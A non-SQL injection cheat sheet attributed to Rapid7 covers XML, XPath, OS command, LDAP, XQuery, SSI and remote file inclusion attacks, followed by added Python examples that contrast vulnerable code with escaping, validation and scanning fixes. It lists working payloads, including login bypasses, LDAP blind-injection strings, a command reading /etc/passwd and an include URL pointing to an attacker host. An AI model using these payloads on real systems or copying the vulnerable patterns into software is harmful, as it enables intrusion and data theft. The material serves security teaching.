INJECTION CHEAT SHEET (non-SQL)   www.rapid7.com

XML Injection

Detection
'                single quote
"                double quote
<>               angle brackets
<!-- -->         XML comment tag
&                ampersand
<![CDATA[ ]]>    CDATA section delimiters

Exploitation
New value for an existing tag, injected together with the tag name (here: add the user as administrator)
http://www.example.com/addUser.php?username=dan&password=123456
0[email protected]   (the remainder of the query string is not legible on the page)

XPATH Injection

Detection
'    single quote
"    double quote

Exploitation
' or 1=1 or ''='               closes the string literal and makes the predicate always true
'] | * | user[@role='admin     closes the predicate and unions every node (*) with the admin users
NODENAME                       selects the NODENAME children of the current node
//NODENAME                     selects all NODENAME elements anywhere in the document
NODENAME/SUBNODENAME           selects all SUBNODENAME children of NODENAME elements
//NODENAME[NAME='VALUE']       selects all NODENAME elements that have a NAME child equal to VALUE (no slash before the predicate)
http://site.com/login.aspx?username=foo' or 1=1 or ''='     login bypass

OS Command Injection

Detection
|     pipe: on *NIX feeds the output of the first command into the next; on Windows it also runs multiple commands
;     semicolon: runs two commands one after the other
%%    Windows only
&     ampersand: runs the command in the background on *NIX; on Windows (cmd.exe) it chains commands

Exploitation
http://site.com/whois.php?domain=foobar; echo+/etc/passwd     displays the content of /etc/passwd
(caveat: `echo /etc/passwd` only prints the string "/etc/passwd"; reading the file needs `cat` or an equivalent in its place)

LDAP Injection

Detection
(    opening bracket
)    closing bracket
|    pipe: OR operator for LDAP
&    ampersand: AND operator for LDAP
!    exclamation: NOT operator for LDAP

Exploitation
(&(param1=val1)(param2=val2))                    AND operator
(|(param1=val1)(param2=val2))                    OR operator
*)(objectClass=*))(&(objectClass=void            blind LDAP injection using the AND operator
void)(objectClass=void))(&(objectClass=void      blind LDAP injection using the OR operator
http://site.com/ldapsearch?user=*                displays the list of all users with their attributes

XQuery Injection

Detection
'    single quote
"    double quote

Exploitation
' or .='
something" or ""="                               closes the double-quoted literal and appends an always-true comparison
http://site.com/xmlsearch?user=foo" or ""="       displays the list of all users with their attributes

SSI Injection

Detection
Look for the words include, echo, exec
File extension .SHTML
< ! # = / . " - > and [a-zA-Z0-9]                characters required for a directive to execute

Exploitation
http://site.com/ssiform.php?showfile=            displays the content of /etc/passwd (the injected directive is not legible on the page)

Remote Code Injection

Detection
Upload file (PHP, JSP, ASP etc.)                 injecting active content
include($incfile);                               PHP call: remote file inclusion/injection

Exploitation
Upload a file, then access it back from the webroot: execution!
http://site.com/page.php?file=http://www.attacker.com/exploit     remote file inclusion/injection
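The XML Injection entry ("new value for an existing tag, injected together with the tag name") as a runnable example. This is an added example, not code from the Rapid7 sheet: the `<user>/<name>/<role>` document, the `PAYLOAD` string and the consumer that reads the first matching element are all constructed here to show why escaping with `xml.sax.saxutils.escape` is the fix.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Constructed attacker input: closes <name>, supplies its own <role>, then reopens
# <name> so the document still parses. Mirrors the sheet's "add user as administrator".
PAYLOAD = "dan</name><role>admin</role><name>dan"


def build_user_vulnerable(name: str, role: str = "user") -> str:
    # Value dropped straight into the markup: the tag structure is attacker-controlled.
    return f"<user><name>{name}</name><role>{role}</role></user>"


def build_user_escaped(name: str, role: str = "user") -> str:
    # escape() rewrites < > & as entities, so the value can never close or open a tag.
    return f"<user><name>{escape(name)}</name><role>{escape(role)}</role></user>"


def read_user(doc: str) -> tuple:
    """Consumer that takes the first <name> and first <role> it sees, plus the number
    of <role> elements, which is 1 for an untampered document."""
    root = ET.fromstring(doc)
    return root.find("name").text, root.find("role").text, len(root.findall("role"))


def demo() -> dict:
    return {
        "vulnerable": read_user(build_user_vulnerable(PAYLOAD)),
        "escaped": read_user(build_user_escaped(PAYLOAD)),
    }


if __name__ == "__main__":
    for kind, (name, role, n_roles) in demo().items():
        print(f"{kind:10s} name={name!r} role={role!r} role_elements={n_roles}")
```

A second `<role>` element appearing in the parsed document is itself a detection signal: a schema-validated parse (one `role` per `user`) would reject the injected document even before the application read the wrong value.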
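The XPATH Injection login bypass (`username=foo' or 1=1 or ''='`) and the XQuery payload (`something" or ""="`) both work because the value is pasted into a quoted string literal. XPath 1.0 and XQuery literals have no escape sequence, so the standard fix is to pick the quote kind the value does not contain, or to build the literal with `concat()` when it contains both. This is an added example, not code from the Rapid7 sheet; the `//user[name=... and password=...]` query is an assumed shape for the sheet's login.aspx lookup, and `MIXED` is a constructed input.

```python
def xpath_literal(value: str) -> str:
    """Return an XPath 1.0 / XQuery string literal that evaluates to exactly `value`.

    A value with only one kind of quote is wrapped in the other kind. A value holding
    both is split on single quotes and glued back with concat(), where each single
    quote sits inside a double-quoted piece, so no piece can end early.
    """
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    pieces = []
    parts = value.split("'")
    for i, part in enumerate(parts):
        if part:
            pieces.append(f"'{part}'")
        if i < len(parts) - 1:
            pieces.append("\"'\"")
    return "concat(" + ", ".join(pieces) + ")"


def login_query_vulnerable(username: str, password: str) -> str:
    # Direct concatenation: the pattern the sheet's login.aspx bypass abuses.
    return f"//user[name='{username}' and password='{password}']"


def login_query_safe(username: str, password: str) -> str:
    # Same query, but every user value goes through xpath_literal().
    return f"//user[name={xpath_literal(username)} and password={xpath_literal(password)}]"


# Constructed inputs: the sheet's XPath and XQuery payloads plus a mixed-quote value.
XPATH_PAYLOAD = "foo' or 1=1 or ''='"
XQUERY_PAYLOAD = 'something" or ""="'
MIXED = "O'Brien \"the\" admin"

if __name__ == "__main__":
    print(login_query_vulnerable(XPATH_PAYLOAD, "x"))
    print(login_query_safe(XPATH_PAYLOAD, "x"))
    print(xpath_literal(XQUERY_PAYLOAD))
    print(xpath_literal(MIXED))
```

Run the two query strings through a real XPath engine (for example lxml, which the standard library does not ship) to see the difference: the vulnerable query's predicate is `name='foo' or 1=1 or ''='' and ...`, true for every user, while the safe query compares `name` against the whole attacker string and matches nobody. Where the engine supports it, a parameterised query (variables bound outside the expression) is better still.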
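The OS Command Injection entry (`whois.php?domain=foobar; ...`) as a runnable contrast between handing the value to a shell and not. This is an added example, not code from the Rapid7 sheet: `echo` stands in for `whois` so it runs offline, `PAYLOAD` is constructed, and the hostname regex is an assumed validation rule. The page's `;` separator is the one exercised; `|` and `&` behave the same way in the vulnerable variant.

```python
import re
import shlex
import subprocess

# Constructed attacker value: the sheet's "foobar; <command>" shape, with a harmless
# second command so the effect is visible in stdout.
PAYLOAD = "foobar; echo INJECTED"

# Assumed validation rule: only hostname characters and at least one dot.
DOMAIN_RE = re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)+$", re.I)


def lookup_vulnerable(domain: str) -> str:
    # Equivalent of PHP system("whois " . $_GET['domain']): /bin/sh parses the line,
    # so ; | & and friends end the command and start another.
    return subprocess.run("echo " + domain, shell=True, capture_output=True, text=True).stdout


def lookup_argv(domain: str) -> str:
    # No shell involved: the whole value is one argv entry, metacharacters and all.
    return subprocess.run(["echo", domain], capture_output=True, text=True).stdout


def lookup_quoted(domain: str) -> str:
    # When a shell is unavoidable, shlex.quote() wraps the value in single quotes.
    return subprocess.run("echo " + shlex.quote(domain), shell=True, capture_output=True, text=True).stdout


def lookup_validated(domain: str) -> str:
    # Best: reject anything that is not a hostname before it reaches any command.
    if not DOMAIN_RE.fullmatch(domain):
        raise ValueError("not a valid domain name")
    return lookup_argv(domain)


if __name__ == "__main__":
    print("vulnerable:", repr(lookup_vulnerable(PAYLOAD)))
    print("argv:      ", repr(lookup_argv(PAYLOAD)))
    print("quoted:    ", repr(lookup_quoted(PAYLOAD)))
```

The vulnerable call prints two lines (`foobar` and `INJECTED`) because the shell executed two commands; the argv and quoted variants print the payload back as a single literal string.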
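The LDAP Injection blind-AND payload (`*)(objectClass=*))(&(objectClass=void`) as a runnable example of what the server actually receives, and of the RFC 4515 escaping that defuses it. This is an added example, not code from the Rapid7 sheet; the `(&(uid=...)(objectClass=person))` filter is an assumed shape for the sheet's `ldapsearch?user=` lookup, and `first_complete_filter` is a simplified model of a server that evaluates the first balanced filter and drops the rest.

```python
# The sheet's blind-injection payload, used here as a constructed input.
AND_PAYLOAD = "*)(objectClass=*))(&(objectClass=void"


def ldap_escape(value: str) -> str:
    """RFC 4515 escaping for a value placed inside an LDAP search filter:
    * ( ) \\ and NUL become \\XX hex escapes so they can never act as syntax."""
    return "".join(f"\\{ord(c):02x}" if c in "*()\\\x00" else c for c in value)


def user_filter_vulnerable(user: str) -> str:
    # Direct concatenation, as in "(&(uid=" . $user . ")(objectClass=person))".
    return f"(&(uid={user})(objectClass=person))"


def user_filter_safe(user: str) -> str:
    return f"(&(uid={ldap_escape(user)})(objectClass=person))"


def first_complete_filter(flt: str) -> str:
    """Return the prefix up to the first point where parentheses balance.
    A server evaluates this leading filter; a trailing fragment such as
    (&(objectClass=void ... is discarded or rejected, which is what lets the
    injected (&(uid=*)(objectClass=*)) stand on its own."""
    depth = 0
    for i, c in enumerate(flt):
        if c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                return flt[: i + 1]
    return flt


if __name__ == "__main__":
    vuln = user_filter_vulnerable(AND_PAYLOAD)
    print("sent:     ", vuln)
    print("evaluated:", first_complete_filter(vuln))
    print("escaped:  ", user_filter_safe(AND_PAYLOAD))
```

With escaping, the whole string stays one balanced filter that compares `uid` against the literal payload text and matches nothing; the page's OR payload (`void)(objectClass=void))(&(objectClass=void`) is neutralised the same way.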
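The SSI Injection detection entry (look for `include`, `echo`, `exec`; the `<!#=/."->` character set) turned into a scanner you can run over form input or uploaded content. This is an added example, not code from the Rapid7 sheet: the sample strings are constructed, and the directive list extends the page's three words with the other mod_include directives (`config`, `set`, `printenv`, `flastmod`, `fsize`).

```python
import html
import re

# Apache mod_include syntax: <!--#directive attr="value" -->  (whitespace is tolerated
# around the # and before -->, so the pattern allows it too).
SSI_DIRECTIVE = re.compile(
    r"<!--\s*#\s*(include|echo|exec|config|set|printenv|flastmod|fsize)\b(.*?)-->",
    re.I | re.S,
)


def find_ssi(text: str) -> list:
    """Return (directive, arguments) for every SSI directive found in text."""
    return [(m.group(1).lower(), m.group(2).strip()) for m in SSI_DIRECTIVE.finditer(text)]


def neutralize(text: str) -> str:
    # HTML-encoding '<' and '>' is enough: a directive that cannot begin with a literal
    # '<!--#' is never parsed by mod_include.
    return html.escape(text, quote=False)


# Constructed samples: two real directives, one with loose spacing, two benign strings.
SAMPLES = [
    '<!--#exec cmd="id" -->',
    '<!--#echo var="DOCUMENT_NAME" -->',
    '<!-- #include virtual="/footer.shtml" -->',
    "<!-- plain HTML comment -->",
    "hello <b>world</b>",
]


def scan(samples=SAMPLES) -> dict:
    return {s: find_ssi(s) for s in samples}


if __name__ == "__main__":
    for sample, hits in scan().items():
        print(f"{sample!r:45s} -> {hits or 'clean'}")
```

Only the first three samples are reported; the scanner is for triage (and for catching `.shtml` content that was never meant to carry directives), while `neutralize` is what the application should apply to any user value it writes into a page served with SSI enabled.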
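The Remote Code Injection entries (`include($incfile)` fed from `page.php?file=http://www.attacker.com/exploit`, and uploading active content that is then fetched from the webroot) as a resolver that accepts only local files under the webroot, plus a name check for uploads. This is an added example, not code from the Rapid7 sheet: the webroot `/srv/www`, the allowed extensions and the active-content extension list are assumptions chosen for illustration.

```python
import os
from urllib.parse import urlsplit

# Assumed policy: includes may only resolve to these file types under the webroot.
ALLOWED_EXT = (".php", ".html")

# Assumed list of extensions a web server would execute rather than serve.
ACTIVE_EXT = {".php", ".phtml", ".php5", ".jsp", ".jspx", ".asp", ".aspx", ".shtml", ".cgi"}


def resolve_include(webroot: str, requested: str):
    """Map a user-supplied include name to a file under webroot, or None if it
    is remote (RFI), a stream wrapper, a traversal (LFI) or a disallowed type."""
    if "\x00" in requested:
        return None                      # null-byte truncation tricks
    if urlsplit(requested).scheme:
        return None                      # http://, ftp://, php://, data: ... never fetched
    root = os.path.realpath(webroot)
    candidate = os.path.realpath(os.path.join(root, requested.lstrip("/\\")))
    if os.path.commonpath([root, candidate]) != root:
        return None                      # ../ traversal escaped the webroot
    if not candidate.endswith(ALLOWED_EXT):
        return None
    return candidate


def upload_is_active_content(filename: str) -> bool:
    """True if any suffix of the name is executable content: 'shell.php.jpg' is
    caught as well as 'shell.php', since some servers honour inner extensions."""
    suffixes = filename.lower().split(".")[1:]
    return any("." + s in ACTIVE_EXT for s in suffixes)


if __name__ == "__main__":
    for req in ["pages/about.php", "http://www.attacker.com/exploit", "../../etc/passwd"]:
        print(f"{req!r:40s} -> {resolve_include('/srv/www', req)}")
    for name in ["photo.jpg", "shell.php", "shell.php.jpg"]:
        print(f"{name!r:20s} active={upload_is_active_content(name)}")
```

The upload check is a name heuristic only; the server-side guarantee is to store uploads outside the webroot (or in a directory where execution is disabled) so that "access it back from the webroot" is impossible regardless of the file name.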